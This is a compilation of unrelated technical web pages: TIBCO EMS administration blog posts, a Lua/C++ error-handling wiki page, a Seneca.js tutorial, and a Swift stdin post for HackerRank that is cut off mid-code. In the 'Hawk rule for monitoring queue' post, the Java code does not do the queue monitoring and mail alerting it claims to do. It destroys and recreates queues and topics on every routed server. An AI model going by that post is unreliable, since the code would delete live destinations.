^Server Management. Including general server configuration, JMS destinations, JNDI factories, users/groups, permissions, bridges, routes etc.
^JMS Message Monitoring. Messages may be monitored (snooped) as they pass through the server.
^JMS Message Management. Messages may be sent/received, queues may be browsed and message contents inspected. Selectors and filters may be specified.
^Charting. Server statistics may be charted in real time; data may be saved to CSV files for export to other tools such as Excel.
^Logging. Server statistics may be logged automatically when warning or error limits are breached.
^Security. SSL connectivity, view only mode.
^Customisable display and look and feel.
^JMS support. Request and reply messages can be correlated to provide service response times.

Gems requires Tibco EMS 4.x or 5.x and JRE 1.5 or higher.

Leave a comment
Posted by SRIK on February 18, 2011 in Tibco EMS

Tibco EMS Monitoring (07 NOV)

If you are using Tibco EMS, you should be aware that there is a decent tool that comes with the Tibco SDK that allows you to monitor all activity that goes on in your broker. In the directory c:\tibco\ems\bin, you will find a command-line application called tibemsmonitor. If you run this utility, you can see every connect/disconnect, every creation and destruction of a MessageProducer and MessageConsumer, every creation of a topic or queue.

tibemsmonitor -monitor <topic> [-server <serverurl>] [-user <name>] [-password <password>] [-selector <text>] [-short] [-help] [-helpssl]

tibemsmonitor -server "tcp://emshost:7222" -monitor ">"

The related administration commands are:

tibemsadmin [-server] [-user] [-password]
tibemsadmin.exe -server "tcp://emshost:7222" -user admin -password admin123

tibemsd [-config <filename>] [-ft_active <active_url>] [-ft_heartbeat <seconds>] [-ft_activation <seconds>] [-ssl_password <string>] [-trace <items>] [-ssl_trace] [-ssl_debug_trace] [-help]
tibemsd -config c:\tibco\cfgmgmt\ems\data\tibemsd.conf

Leave a comment
Posted by SRIK on November 7, 2010 in Tibco EMS

How to handle corrupted message in EMS datastore? (OCT)

Problem Description

When a message is corrupted in the EMS database, you may notice the following errors in the EMS log file:

SEVERE ERROR: Exception trying to create valid messages record, Invalid message.
SEVERE ERROR: Exception trying to read message from store.
SEVERE ERROR: Exception trying to create message from store: I/O exception.
SEVERE ERROR: Persisted message possibly corrupt.

When a corrupted message is sent to a client and the client application cannot process the corrupted message properly, the client will block successive messages sent to it. These messages will remain queued on the server and will not be consumed by the client. When your client tries to consume the message, you may get a "javax.jms.JMSException: Corrupted incoming data message" exception.

Possible Reasons for Generating Corrupted Messages in the EMS Datastore

1. A hardware problem with the physical disk: media error.
2. The machine was terminated abruptly. For example: a running system in operation has been unplugged, etc.
3. Forced unmount of a physical disk when the disk is in use, or a hard disk in operation having been unplugged.
4. A locking problem: the record in the db file has been modified by different applications/threads of the application at the same time.
5. The EMS server receives a corrupt message.

Solution

When one or more messages are corrupted and a client cannot receive the corrupted messages, you can do the following to delete the corrupted messages:

1. Enable track_message_ids. In the EMS main configuration file, tibemsd.conf, set: track_message_ids=enabled.
2. If you have already enabled track_message_ids, then you should try to remove the corrupt message as follows:
a) Use the tibemsadmin command (available in the EMS_HOME\bin directory) to set server console_trace = +MSG (or set log_trace if that is more appropriate).
b) Use the tibemsadmin command to set addprop queue trace.
c) When the server delivers the corrupted message to the consumer, the server should print the message ID.
d) Use the tibemsadmin command "delete message" with that message ID to remove the corrupted message.
e) Undo steps a) and b), if needed.

Leave a comment
Posted by SRIK on October 31, 2010 in Tibco EMS

How to Configure the EMS Server with a Database Datastore? (OCT)

EMS 5 can be configured to use a database to store messages. The following steps have been tested on a Windows host to configure EMS 5 with a database. For other platforms, the steps will be similar.

Setup Steps:

1. Install EMS 5.0.
2. Download and install JDK 1.5 or later.
3. Download and install Hibernate from the link provided at the EMS 5.0 download on http://download.tibco.com.
4. Download the corresponding database JDBC drivers. They can be found on the Internet. For example: Microsoft SQL Server uses the Microsoft JDBC Driver for SQL Server (sqljdbc.jar); MySQL InnoDB uses the MySQL Connector (mysql-connector-java-5.0.6-bin.jar); for Oracle 9i and 10g
and IBM DB2 Server 8.1, use the Oracle JDBC Thin Driver (ojdbc14.jar or ojdbc5.jar) and the DB2 Universal JDBC Driver (db2jcc.jar plus db2jcc_license_cu.jar), respectively. The corresponding jar files for the JDBC driver need to be added to dbstore_classpath in the EMS main configuration file.

5. Create database users for EMS usage in the database. The users should have permissions to create, alter, delete, and update for table, index, and sequence.

6. Modify the sample EMS main configuration file used for database, c:\tibco\ems\5.0\samples\config\tibemsd-db.conf. Modify the variables dbstore_classpath, dbstore_driver_name, dbstore_driver_dialect, and jre_library to reflect your own settings and database. Here is an example which uses the Oracle 10g database:

dbstore_classpath = c:\tibco\components\eclipse\plugins\com.tibco.tpcl.org.hibernate\hibernate3.jar;c:\tibco\ems\5.0\bin\antlr.jar;c:\tibco\ems\5.0\bin\cglib.jar;c:\tibco\ems\5.0\bin\asm.jar;c:\tibco\ems\5.0\bin\asm-attrs.jar;c:\tibco\ems\5.0\bin\commons-collections.jar;c:\tibco\ems\5.0\bin\commons-logging.jar;c:\tibco\ems\5.0\bin\dom4j.jar;c:\tibco\ems\5.0\bin\ehcache.jar;c:\tibco\ems\5.0\bin\jta.jar;c:\tibco\components\eclipse\plugins\com.tibco.tpcl.org.c3p0\c3p0.jar;c:\tibco\ems\5.0\databaselib\ojdbc14.jar
dbstore_driver_name = oracle.jdbc.driver.OracleDriver
dbstore_driver_dialect = org.hibernate.dialect.Oracle10gDialect
jre_library = C:\jdk1.5.0_06\jre\bin\server\jvm.dll

7. Modify c:\tibco\ems\5.0\samples\config\stores-db.conf to put your own database store information. For example, in stores-db.conf, define the Oracle database information:
When defining the database stores in EMS 5, you will need to define the following parameters in stores-db.conf:

dbstore_driver_url = JDBCURL
dbstore_driver_username = username
dbstore_driver_password = password

For example, for the $sys.failsafe store:

[$sys.failsafe]
type=dbstore
dbstore_driver_url=jdbc:oracle:thin:adminfs/admin123@//osrv_1:1521/orclperf
dbstore_driver_username=adminfs
dbstore_driver_password=admin123

8. Modify the file queues.conf or topics.conf to define where the messages will be stored, by appending properties such as:

maxbytes=10MB,trace,store=$sys.failsafe

to the queue or topic entries.

9. Use the schema export tool to export the EMS schema into the database. Example:

java -jar c:\tibco\ems\5.0\bin\tibemsd_util.jar -tibemsdconf c:\tibco\ems\5.0\samples\config\tibemsd-db.conf -createall -export

See the TIBCO Enterprise Message Service User's Guide, Chapter 5, entitled "Running the EMS Server", for details about the schema export tool.

10. Start the EMS server using c:\tibco\ems\5.0\samples\config\tibemsd-db.conf.

Leave a comment
Posted by SRIK on October 31, 2010 in Tibco EMS

How to Secure the Database Password in the EMS Configuration file? (OCT)

The database password can be entered as clear text for two parameters: dbstore_driver_password and dbstore_driver_url.

1. dbstore_driver_url. When defining dbstore_driver_url for an Oracle database, the URL format is entered as follows:

dbstore_driver_url=jdbc:oracle:thin:user/password@//remote_database_name

If you don't want to enter the clear text database password within the URL, you can define the Oracle service name (alias name) for the database using the following syntax:

dbstore_driver_url=jdbc:oracle:thin:@//dbservice_name

2. dbstore_driver_password. You can also use a mangled password for dbstore_driver_password. That is, you can use the tibemsadmin tool to mangle a database password and define the mangled password for dbstore_driver_password. For example, you can run the tibemsadmin command to mangle a clear text password:

tibemsadmin.exe -mangle
TIBCO Enterprise Message Service Administration Tool.
Copyright 2003-2008 by TIBCO Software Inc. All rights reserved.
Version 5.0.0 V27 4/29/2008
Enter phrase to mangle:
Confirm phrase to mangle:
$man$-7VM441RHf:3<s@=#T2dmccA0Ps

In stores.conf, you can define the mangled password for dbstore_driver_password:

dbstore_driver_password=$man$-7VM441RHf:3<s@=#T2dmccA0Ps

This way you don't need to define the db username and db password in the dbstore_driver_url parameter.

Leave a comment
Posted by SRIK on October 31, 2010 in Tibco EMS

Hawk rule for monitoring queue (OCT)

You can use the EMS admin API to get the queue stats and check them against the flowcontrol value to find out if it exceeds 90%. Call the API using a script from Hawk and send mail when it exceeds the limit. Please find the code below.

/*
 * Copyright 2007-2010 SRIK Solutions Pvt Ltd Inc.
 * All rights reserved.
 *
 * For more information, please contact us:
 */
import java.util.*;
import javax.jms.Destination;
import javax.jms.Queue;
import javax.jms.Topic;
import com.tibco.tibjms.admin.*;

//
// The tibjmsServerAdministrator class is used by the tibjmsPerfMaster class
// to change various settings in the EMS server.
//
public class tibjmsServerAdministrator {

    TibjmsAdmin[] _admin = null;
    String queue = null;
    String topic = null;

    /**
     * Creates an admin client on the specified server
     * and then walks any routes to other servers creating
     * admin clients on the discovered servers as well.
     *
     * @param serverUrl server URL on which to connect
     * @param userName the administrator name
     * @param password the administrator password
     */
    public tibjmsServerAdministrator(String serverUrl, String userName, String password) {
        Map map = new HashMap();
        addAdmin(serverUrl, userName, password, map);
        _admin = new TibjmsAdmin[map.size()];
        map.values().toArray(_admin);
    }

    private void addAdmin(String serverUrl, String userName, String password, Map map) {
        try {
            System.err.println("connecting as " + userName + " to " + serverUrl);
            TibjmsAdmin admin = new TibjmsAdmin(serverUrl, userName, password);
            ServerInfo si = admin.getInfo();
            // enable statistics
            si.setStatisticsEnabled(true);
            admin.updateServer(si);
            if (!map.containsKey(si.getServerName())) {
                map.put(si.getServerName(), admin);
                RouteInfo[] ri = admin.getRoutes();
                for (int i = 0; i < ri.length; i++) {
                    if (!map.containsKey(ri[i].getName()) && ri[i].isConnected())
                        addAdmin(ri[i].getURL(), userName, password, map);
                }
            } else {
                admin.close();
            }
        } catch (Exception e) {
            e.printStackTrace();
            System.exit(-1);
        }
    }

    /**
     * Create a topic on all servers.
     *
     * @param name topic name
     * @param failsafe failsafe setting
     * @param flowControl flow control setting
     */
    public void createTopic(String name, boolean failsafe, long flowControl) {
        try {
            TopicInfo ti = new TopicInfo(name);
            ti.setFailsafe(failsafe);
            ti.setFlowControlMaxBytes(flowControl);
            ti.setGlobal(_admin.length > 1);
            System.err.println("creating topic " + name);
            for (int i = 0; i < _admin.length; i++) {
                _admin[i].destroyTopic(name);
                _admin[i].createTopic(ti);
            }
            topic = name;
        } catch (Exception e) {
            e.printStackTrace();
            System.exit(-1);
        }
    }

    /**
     * Create a queue on all servers.
     *
     * @param name queue name
     * @param server name of queue's home server
     * @param failsafe failsafe setting
     * @param flowControl flow control setting
     * @param prefetch prefetch setting
     */
    public void createQueue(String name, String server, boolean failsafe, long flowControl, int prefetch) {
        String fullName = name;
        if (server != null)
            fullName = name + "@" + server;
        try {
            QueueInfo qi = new QueueInfo(fullName);
            qi.setFailsafe(failsafe);
            qi.setFlowControlMaxBytes(flowControl);
            qi.setGlobal(_admin.length > 1);
            qi.setPrefetch(prefetch);
            System.err.println("creating queue " + fullName);
            for (int i = 0; i < _admin.length; i++) {
                _admin[i].destroyQueue(name);
                _admin[i].createQueue(qi);
            }
            queue = name;
        } catch (Exception e) {
            e.printStackTrace();
            System.exit(-1);
        }
    }

    /**
     * Return the number of receivers from all servers
     * for a particular destination.
     *
     * @param dest the destination
     * @return the number of receivers for the destination
     */
    public int getNumberOfReceivers(Destination dest) {
        int numReceivers = 0;
        try {
            for (int i = 0; i < _admin.length; i++) {
                DestinationInfo info;
                if (dest instanceof Topic)
                    info = _admin[i].getTopic(((Topic) dest).getTopicName());
                else
                    info = _admin[i].getQueue(((Queue) dest).getQueueName());
                ConsumerInfo[] ci = _admin[i].getConsumersStatistics(null, null, info);
                if (ci != null)
                    numReceivers += ci.length;
            }
        } catch (Exception e) {
            e.printStackTrace();
            System.exit(-1);
        }
        return numReceivers;
    }

    /**
     * Check if flow control is enabled for all servers.
     *
     * @return true iff flow control is enabled on all servers
     */
    public boolean isFlowControlEnabled() {
        boolean flowControlEnabled = true;
        try {
            for (int i = 0; i < _admin.length; i++) {
                ServerInfo si = _admin[i].getInfo();
                if (!si.isFlowControlEnabled())
                    flowControlEnabled = false;
            }
        } catch (Exception e) {
            e.printStackTrace();
            System.exit(-1);
        }
        return flowControlEnabled;
    }

    /**
     * Remove the destinations from all servers.
     */
    public void cleanup(String controlTopic) {
        try {
            for (int i = 0; i < _admin.length; i++) {
                if (topic != null) {
                    TopicInfo[] info = _admin[i].getTopics(topic);
                    for (int j = 0; j < info.length; j++) {
                        if (!controlTopic.equals(info[j].getName()))
                            _admin[i].destroyTopic(info[j].getName());
                    }
                }
                if (queue != null) {
                    QueueInfo[] info = _admin[i].getQueues(queue);
                    for (int j = 0; j < info.length; j++) {
                        _admin[i].destroyQueue(info[j].getName());
                    }
                }
            }
        } catch (Exception e) {
            e.printStackTrace();
            System.exit(-1);
        }
    }
}

Leave a comment
Posted by SRIK on October 30, 2010 in Tibco EMS

To add an EMS server to TIBCO Administrator, follow these steps (20 OCT)

Note: To add the EMS server, both Administrator and EMS should be up and running.

1. Make sure the TRA is installed on the machine where the EMS server is running.
2. Run Domain Utility from <TIBCO_HOME>/TRA/<version that matches your domain>/bin/DomainUtility (.exe in Windows, .bin in Unix). In Windows you can double click the Domain Utility, but in Unix use an x-windows capable terminal like Reflection or Cygwin; Putty does not support x-windows. (Note: to enable GUI mode in Unix, your desktop must have x-windows.)
3. Choose EMS administration from the menu list.
4. Click Add EMS server to TIBCO domain, and Next.
5. Enter all the details that are required for EMS (version, path of the tibemsd executable: .exe in Windows, .bin in Unix).
6. Enter the port number.
7. Enter the user name and password.
8. Test the connection.
9. Finish the rest.
10. Stop the EMS server and start it from TIBCO Administrator.
https://www.scribd.com/document/205210441/A-TIBCO-BusinessWorks
[ Note: this page is somewhat of a work in progress. Additional comments are welcome. ]

If you compile Lua as C and use it from C++, you must surround your #include <lua.h> in an extern "C", or use the #include <lua.hpp> equivalent, else you will get linker errors.

extern "C" {
#include <lua.h>
}

// alternately do
#include <lua.hpp>

Lua itself is normally compiled under C but may alternately be compiled under C++. If compiled in C, Lua uses [longjmp]'s to implement error handling (lua_error). If compiled in C++, Lua by default uses C++ exceptions. See the declaration of LUAI_THROW in luaconf.h. See also LuaList:2007-10/msg00473.html.

There is a mismatch between C++ exception handling, which properly unwinds the stack and calls destructors, and Lua longjmps, which merely toss the stack, so more care is needed if Lua is compiled in C to ensure all necessary C++ destructors are called, preventing memory or resource leaks.

When C++ calls Lua as an extension language, the Lua operations often (but not always) need to be wrapped in a pcall to a lua_CFunction. For example, see [PIL 25.2] or PIL2 25.3. (Details on these conditions are given later below by Rici.) It's often the case that this lua_CFunction is used by only one caller. Therefore, it can be useful to make the lua_CFunction local to the calling function (like a closure). In C++, the lua_CFunction can be defined inside a struct like this:

int operate(lua_State * L, std::string & s, int x, int y)
{
  std::string msg = "Calling " + s + "\n"; // can raise exception; must be destroyed
  cout << msg;
  // caution: this code may raise exceptions but not longjump.

  struct C {
    static int call(lua_State * L) {
      // caution: this code may longjump but not raise exceptions.
      C * p = static_cast<C*>(lua_touserdata(L, 1));
      assert(lua_checkstack(L, 4));
      lua_getglobal(L, "add");   // can longjump
      assert(lua_isfunction(L, -1));
      lua_pushstring(L, p->s);   // can longjump
      lua_pushnumber(L, p->x);
      lua_pushnumber(L, p->y);
      lua_call(L, 3, 1);         // can longjump
      assert(lua_isnumber(L, -1));
      p->z = (int)lua_tonumber(L, -1);
      return 0;
    }
    const char * s;
    int x;
    int y;
    int z;
  } p = {s.c_str(), x, y, 0};

  int res = lua_cpcall(L, C::call, &p); // never longjumps
  if (res != 0) {
    handle_error(L); // do something with the error; can raise exception
    // note: we let handle_error do lua_pop(L, 1);
  }
  return p.z;
}

Now, error handling is a bit tricky at first glance. The lua_getglobal, lua_pushstring, and lua_call calls can generate a lua_error(), i.e. a longjmp if Lua is compiled in C. The lua_cpcall, which is outside the protected call, is safe because it does not generate a lua_error() (unlike using a lua_pushcfunction followed by a lua_pcall, which could lua_error on memory allocation failure). Unlike C++ exception handling, the longjmp will skip any destructors of objects up the stack (often used for RAII in C++). Another issue: if lua_cpcall returns a failure result, what do we do with it? There is a possibility we could handle the error in-place, lua_pop it, and continue. More often, the error needs to be dealt with at a more shallow point in the call chain. Possibly a better solution is to keep the error message on the Lua stack, making sure to do a lua_pop if it is consumed in a catch block:

#include <stdexcept>
#include <boost/shared_ptr.hpp>

/**
 * C++ exception class wrapper for Lua error.
 * This can be used to convert the result of a lua_pcall or
 * similar protected Lua C function into a C++ exception.
 * These Lua C functions place the error on the Lua stack.
 * The LuaError class maintains the error on the Lua stack until
 * all copies of the exception are destroyed (after the exception is
 * caught), at which time the Lua error object is popped from the
 * Lua stack.
 * We assume the Lua stack is identical at destruction as
 * it was at construction.
 */
class LuaError : public std::exception
{
private:
  lua_State * m_L;
  // resource for error object on Lua stack (is to be popped
  // when no longer used)
  boost::shared_ptr<lua_State> m_lua_resource;
  LuaError & operator=(const LuaError & other); // prevent assignment
public:
  // Construct using top-most element on Lua stack as error.
  LuaError(lua_State * L);
  LuaError(const LuaError & other);
  ~LuaError() throw();
  virtual const char * what() const throw();
};

static void LuaError_lua_resource_delete(lua_State * L)
{
  lua_pop(L, 1);
}

LuaError::LuaError(lua_State * L)
  : m_L(L), m_lua_resource(L, LuaError_lua_resource_delete)
{ }

LuaError::LuaError(const LuaError & other)
  : m_L(other.m_L), m_lua_resource(other.m_lua_resource)
{ }

LuaError::~LuaError() throw() { }

const char * LuaError::what() const throw()
{
  const char * s = lua_tostring(m_L, -1);
  if (s == NULL) s = "unrecognized Lua error";
  return s;
}

Example usage:

for (int n = 1; n < 100; n++) {
  try {
    string s = "123123123123123123"; // note: may throw bad_alloc
    // ...
    int res = lua_cpcall(L, call, NULL);
    if (res != 0)
      throw LuaError(L);
  }
  catch (exception & e) {
    cout << e.what() << endl;
  }
}

There is also the case where Lua calls a C function that calls C++ code that calls Lua code. In such a case, the C++ code might pcall into Lua and convert any error message to a C++ exception, which propagates up to the C function. The C function then needs to convert the C++ exception to a lua_error(), which longjmps to Lua. This conversion to a C++ exception is only needed if the C++ code in the call chain allocated memory in the RAII fashion. --DavidManura

- None of the pure stack manipulation functions will raise a Lua error: lua_pop, lua_gettop, lua_settop, lua_pushvalue, lua_insert, lua_replace and lua_remove. If you provide incorrect indexes to these functions, or you haven't called lua_checkstack, then you're either going to get garbage or a segfault, but not a Lua error.
- None of lua_pushnumber, lua_pushnil, lua_pushboolean and lua_pushlightuserdata ever throw an error. API functions which push complex objects (strings, tables, closures, threads, full userdata) may throw a memory error.
- None of the type enquiry functions -- lua_is*, lua_type and lua_typename -- will ever throw an error, and neither will the functions which set/get metatables and environments. lua_rawget, lua_rawgeti and lua_rawequal will also never throw an error. Aside from lua_tostring, none of the lua_to* functions will throw an error, and you can avoid the possibility of lua_tostring throwing an out of memory error by first checking that the object is a string, using lua_type.
- lua_rawset and lua_rawseti may throw an out of memory error. The functions which may throw arbitrary errors are the ones which may call metamethods; these include all of the non-raw get and set functions, as well as lua_equal and lua_lt.
- If you need to guarantee that some C-side resource is released, create a userdata with a __gc metamethod. Then you should create the object which may need to be freed and put it in the userdata. This will avoid resource leaks because the __gc method will eventually be called if an error is subsequently thrown. A good example of this is the standard liolib.c which uses this strategy to avoid leaking file descriptors.

-- RiciLake
https://lua-users.org/wiki/ErrorHandlingBetweenLuaAndCplusplus
Quick Intro to Node.JS Microservices: Seneca.JS

What is microservices architecture?

These days, everyone is talking about microservices, but what is it really? Simply said, microservices architecture is when you separate your application into smaller applications (we will call them services) that work together. I have found one awesome image that represents the difference between monolith and microservices apps:

The picture above explains it. On the left side we see one app that serves everything. It's hosted on one server and it's usually hard to scale. On the right side, we see the microservices architecture. This app has a different service for each functionality. For example: one is for user management (registration, user profiles...), the second one is for emails (sends emails, customises templates...), the third one is for some other functionality. These services communicate using an API (they usually send JSON messages), and they can be on the same server. But the good thing is that they can be spread across different servers or Docker containers.

How can I use NodeJS to make microservices architecture?

So, you want to use NodeJS to create a microservices architecture? That's very simple and awesome! In my career, I've used many frameworks and libraries for creating microservices architectures, even created custom libraries (don't do it!), until I found SenecaJS.

To explain what Seneca is, I will quote the official website:

Seneca is a microservices toolkit for Node.js. It helps you write clean, organized code that you can scale and deploy at any time.

Simple! Basically, it helps you exchange JSON messages between your services and have a good-looking and readable codebase. Seneca uses actions. There are action definitions and action calls. We can store our action definitions inside our services and call them from any service.
For understanding how Seneca works, you need to think about the modular pattern and avoid the desire to put everything inside one file. I am going to show you how it works!

Let's play!

For this tutorial, we are going to build a simple app. Yay! First, let's create a simple NodeJS app:

npm init

It will walk you through the setup. Then, we will install Seneca:

npm install seneca --save

It will install all the modules we need, and we can just require Seneca and use it. Before we start, let me explain a couple more things to you. There aren't any conventions about what we should put inside our JSON objects, but I have found out that a lot of people use the same style. I am using this one, {role:'namespace', cmd:'action'}, and I recommend you stick to it. Creating a new style can lead to problems if you work in a team. Role is the name of a group of functions and cmd is the name of the action. We use this JSON to identify which function we are going to use. I will create two files, index.js and process.js. index.js will send a request with some numbers to process.js, which will sum them up and return the result. The result will be written to the console from the index.js file. Sounds good? Let's start!

Here is the code from process.js:

module.exports = function( options ) {
    var seneca = this;

    seneca.add( { role:'process', cmd:'sum' }, sum );

    function sum ( args, done ) {
        var numbers = args.numbers;
        var result = numbers.reduce( function( a, b ) {
            return a + b;
        }, 0);
        done( null, { result: result } );
    }
}

Here, we define the function sum and add it to Seneca using the seneca.add function. The identifier is { role:'process', cmd:'sum' }. sum calls the done function and sends the result object. The Seneca function returns objects by default, but it can be customized to return a string or number, too.
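To demystify what seneca.add and seneca.act are doing, here is a toy pattern-matching dispatcher in plain Node. This is not Seneca's actual implementation (Seneca uses a dedicated pattern matcher, patrun, plus transports and plugins); it is only a sketch of the idea:

```javascript
// Toy sketch of Seneca-style add/act: register handlers under JSON
// patterns, then dispatch a message to the first matching pattern.
const patterns = [];

function add(pattern, handler) {
  patterns.push({ pattern, handler });
}

function act(msg, done) {
  // A pattern matches when every one of its keys equals the message's value;
  // extra keys on the message (like "numbers") are passed through as args.
  const entry = patterns.find(({ pattern }) =>
    Object.keys(pattern).every(key => msg[key] === pattern[key])
  );
  if (!entry) return done(new Error('no matching pattern'));
  entry.handler(msg, done);
}

// The same action as in process.js, keyed by { role, cmd }.
add({ role: 'process', cmd: 'sum' }, (args, done) => {
  const result = args.numbers.reduce((a, b) => a + b, 0);
  done(null, { result });
});

act({ role: 'process', cmd: 'sum', numbers: [1, 2, 3] }, (err, out) => {
  console.log(out); // { result: 6 }
});
```

Running this file with node prints { result: 6 }, the same shape the real Seneca example returns.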
Finally, here is the code from index.js:

var seneca = require('seneca')();

seneca.use( './process.js' );

seneca.act(
  { role: 'process', cmd: 'sum', numbers: [ 1, 2, 3 ] },
  function ( err, result ) {
    console.log( result );
  }
)

As you can see, we use seneca.use to tell Seneca that we are going to use the process.js file and that we defined our function there. In the next lines, we use seneca.act to call the function from process.js. We are sending the JSON object with role and cmd, along with the arguments numbers. The result object is returned and it should contain our result. Let's test it:

node index.js

Woohoo, it works! It returned the { result: 6 } object and that's what we expected!

Conclusion

Seneca is awesome, it has big potential and you can create more complex apps with it. You can run multiple node processes and use the same services in-process, and a lot of other cool stuff. I will write more about this topic. Stay tuned! I hope you liked this introduction and tutorial to Seneca.js! If you want to learn more about it, you can check out the SenecaJS website and their API page.
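Seneca's add/act pattern is easy to picture without the library. The following is a tiny dependency-free sketch of the same idea; it is not Seneca (the real matcher is far more general than exact role/cmd keys), just an illustration of the message-routing pattern the tutorial describes:

```javascript
// Minimal sketch of the add/act idea, without Seneca.
// Actions are stored under a "role:cmd" key; act() looks one up
// and invokes it with (args, done), like the tutorial's process.js.
function createBus() {
  var actions = {};
  return {
    add: function (pattern, handler) {
      actions[pattern.role + ':' + pattern.cmd] = handler;
    },
    act: function (msg, done) {
      var handler = actions[msg.role + ':' + msg.cmd];
      if (!handler) return done(new Error('no action matched'));
      handler(msg, done);
    }
  };
}

var bus = createBus();
bus.add({ role: 'process', cmd: 'sum' }, function (args, done) {
  var total = args.numbers.reduce(function (a, b) { return a + b; }, 0);
  done(null, { result: total });
});
bus.act({ role: 'process', cmd: 'sum', numbers: [1, 2, 3] }, function (err, result) {
  console.log(result); // { result: 6 }
});
```

Swapping this toy bus for Seneca is what lets the same calls cross process and network boundaries later.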
https://www.codementor.io/ivan.jovanovic/introduction-to-nodejs-microservices-senecajs-du1088h3k
HackerRank in Swift - StdIn [OUTDATED] A way to read standard input for HackerRank assignments in Swift. HackerRank is an amazing resource. It features lots of programming assignments from a multitude of domains. This is a perfect place to prep yourself for an upcoming interview, to improve your problem-solving skills and even to learn a new language. For all those who follow the Swift programming language closely, it is now supported by HackerRank. So if you are desperate to write some Swift code and don't have any real projects to apply it to, HackerRank might be an excellent place to do just that. Well, Swift support on HackerRank has been on and off lately. A few months after I wrote this post Swift 1.2 was released; a few days later it disappeared from HackerRank. Probably they have problems catching up with Swift's development schedule. In any case you can still solve the problems in Swift and then submit them in bulk once HackerRank engineers get it working. Most (if not all) of the assignments require reading data from standard input. The format is usually like this.

<N>
<test-case-1>
<test-case-2>
...
<test-case-N>

In this example N is the total number of test cases. It is then followed by N lines, each corresponding to the input for a test case. This is common, but not the only way to provide input. Some assignments have 2-line test cases or some other format. In any case, one common feature between all assignments is that you need to read data line by line. So let's start with the implementation of the core getLine function in Swift.

Get Line

import Foundation

// MARK: Standard Input

/// Reads a line from standard input
/// :returns: string from stdin
public func getLine() -> String {
    var buf = String()
    var c = getchar()
    // 10 is ascii code for newline
    while c != EOF && c != 10 {
        buf.append(UnicodeScalar(UInt32(c)))
        c = getchar()
    }
    return buf
}

The code is straightforward.

- Declare a buf variable used to accumulate the result string.
- Declare a c variable used to read the next character from stdin with getchar
- Loop until reaching the end of file (EOF) or a newline (ASCII code 10)
- On each iteration append the newly read character to the accumulator string

You've probably heard lots of things about Swift. Among all the things, one very important feature is its interoperability with Objective-C and C languages. This small code snippet isn't 100% "pure" Swift code. First of all, it's using the getchar function from the C Standard Library, made available via the Foundation framework import. No worries though, all these APIs are toll-free bridged to Swift. This also explains the chain of initializers / type-casts when appending a new character to the accumulator string. getchar() returns the ASCII code of the character as an Int32. The thing is that Swift's String is not your good old ASCII null-terminated C string; it is actually a collection of Unicode scalars. Bear in mind that collection isn't just a figure of speech, it actually means that the String type conforms to the CollectionType protocol. Anyway, to create an instance of UnicodeScalar you need to have a value of UInt32 type, hence the conversion of c to UInt32. An important note: this code will not work properly with actual Unicode input. Anything outside of the standard ASCII table will be rendered as gibberish. Obviously getchar is not up for the job of reading Unicode characters. However, on HackerRank you would never get non-ASCII input (at least for the assignments that I saw), so this function does a perfect job for its targeted application area.

Read Line

Now that you can get a line, the next thing you will want is to convert that line into something else. For example, if the line is just one integer, you would like to convert it into a value of Int type. If it's a list of integers (space- or comma-, or whatever-separated), you would obviously want to convert it to Array<Int> or [Int]. And so on and so forth. I am actually inspired by Haskell here.
It has a core getLine function to get a line as a string, and it also has a readLn method, which doesn't just get the line, but also allows converting it into a value of the desired type.

-- Haskell
-- Read a line and convert to IO Int
n <- readLn :: IO Int

-- Get a line and convert (read) it as array of Int
line <- getLine
let input = read line :: [Int]

So I wanted to have something similar to use in Swift. This is one possible solution.

/// Read line from standard input
/// :returns: string
public func readLn() -> String {
    return getLine()
}

/// Read line from standard input and convert to integer
/// :returns: integer value
public func readLn() -> Int {
    return getLine().toInt()!
}

/// Read line and convert to array of strings (words)
/// :returns: array of strings
public func readLn() -> [String] {
    return getLine().componentsSeparatedByCharactersInSet(NSCharacterSet.whitespaceCharacterSet())
}

/// Read line and convert to array of integers
/// :returns: array of integers
public func readLn() -> [Int] {
    let words: [String] = readLn()
    return words.map { $0.toInt()! }
}

Let's review each function.

public func readLn() -> String - This is really just an alias for getLine(), as you can clearly see from its implementation.

public func readLn() -> Int - This function gets the line and converts it to Int using the toInt() method. Since toInt() returns an optional, we have to use explicit unwrapping (the ! operator). Needless to say, if the string can't be parsed into an integer, the code will crash.

public func readLn() -> [String] - Get the line and parse it into an array of strings. It works from the assumption that the default separator is whitespace. Luckily, this is the case with all HackerRank assignments I've seen so far. It's possible to improve this function and pass a custom separator string as an argument.

public func readLn() -> [Int] - Get the line and parse it into an array of integers. You might have thought that this function kind of calls itself.
Of course it’s not true and there’s no recursion here. Because the line let words: [String] = readLn()explicitly specifies the type of the wordsconstant, Swift compiler calls the public func readLn() -> [String]function matching the [String]type of words. Once it gets an array of strings, it maps each value to its integer counterpart with toInt()call. Obviously, you can define as many readLn functions as you wish, but the sane thing to do is to define new function when particular assignment requires it. For example, somewhere down the middle of Warmup section in Algorithms domain, you will need a function like this. // An array of (Int, String) tuples public func readLn() -> [(Int, String)] { // ... } Generics? OK, so when you see 4 readLn functions that differ by return type only, what does the common sense tell you? And what does each and every functional programming text book recommend in this case? Right - use generics. But hold on, this is probably the case where generics wouldn’t work right away (I’d be happy to be proven wrong). Generics really work well when lots of functions differ only in types they use, but still have the same implementation details. In this case, each readLn implementation is specific and there aren’t lots of common patterns to be reused. Let’s have a pseudo-code-thought experiment though. public func readLn<T>() -> T { // Not a real Swift code! switch T { case String: return getLine() case Int: return getLine().toInt()! case [String]: return getLine().componentsSeparatedByCharactersInSet(NSCharacterSet.whitespaceCharacterSet()) case [Int]: let words: [String] = readLn() return words.map { $0.toInt()! } default: return getLine() } } Now, this is not a real code and would never compile. The reason is that there’s no simple way to do a switch by the type T. I have found an ugly way to work around this limitation. public func readLn<T>() -> T { if (T.self as? String.Type != nil) { return getLine() } else if (T.self as? 
